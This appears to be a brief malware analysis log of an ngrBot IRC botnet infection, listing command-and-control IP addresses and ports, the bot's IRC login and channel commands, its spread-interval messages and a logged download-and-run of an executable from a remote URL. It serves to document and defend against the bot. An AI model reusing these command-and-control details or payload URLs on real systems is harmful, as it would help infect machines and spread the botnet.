Remote Host Port Number
213.251.170.52 80
64.62.181.43 80
77.79.4.159 1866 PASS ngrBot or PASS xxx
NICK n{US|XPa}mhewugg
USER mhewugg 0 0 :mhewugg
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3”
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4”
PRIVMSG #!hot! :[d=”http://64.62.181.43/dalnets/gaylord.exe” s=”94720 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
UPDATE:
NICK NEW-[USA|00|P|39220]
USER XP-0282 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39220] -ix
JOIN #!high! test
PONG 22 MOTD
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://64.62.181.43/dalnets/gaylord.exe
infos about hosting:
http://whois.domaintools.com/77.79.4.159